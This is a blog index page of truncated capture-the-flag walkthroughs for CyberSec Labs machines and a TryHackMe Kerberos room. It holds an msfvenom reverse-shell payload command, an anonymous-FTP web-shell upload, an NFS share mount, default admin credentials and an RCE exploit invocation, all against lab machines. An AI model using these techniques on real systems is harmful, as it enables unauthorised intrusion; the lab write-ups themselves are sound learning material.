Secrets are meant to be secret

Day June 29, 2020

Weak

172.21.1.1 CyberSec Labs Weak Walkthrough. FTP anonymous login allowed; upload shell.aspx rev shell and get a shell: msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f aspx > shell.aspx http://172.31.1.11/shell.aspx Priv Esc: running whoami /priv, we get the SeImpersonatePrivilege token enabled. So a…

CMS

172.31.1.8 CyberSec Labs CMS Writeup. Another WordPress site. Running WPScan, we find an /uploads directory, which has a screenshot of an id_rsa file's location, which is /home/angel/.ssh/id_rsa. WPScan also shows the Twenty Twenty theme as vulnerable, but can't find anything. But there's…

Shares

172.31.1.7 CyberSec Labs Shares Walkthrough. As the name itself suggests, it has an NFS share open. Looks like /home/amir can be mounted to our machine. Using mount -t nfs 172.31.1.7:/home/amir /tmp/shares/ we mount the amir share to our machine's /tmp/shares/…

Engine

172.31.1.16 CyberSec Labs Engine Walkthrough. Port 80 is open. Gobuster finds a directory, /blog. It is BlogEngine CMS, which is not configured properly and has default creds admin:admin. There's an RCE exploit available for the same: python exploit.py -t 172.31.1.16/blog -l…

Attacking Kerberos

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don't read further. Today let's play TryHackMe's Attackingkerberos at https://tryhackme.com/room/attackingkerberos [Task 1] Introduction: This room will cover all of the basics of attacking Kerberos, the Windows ticket-granting service; we'll cover the following:…

© 2020 MYSTIKO — Powered by WordPress
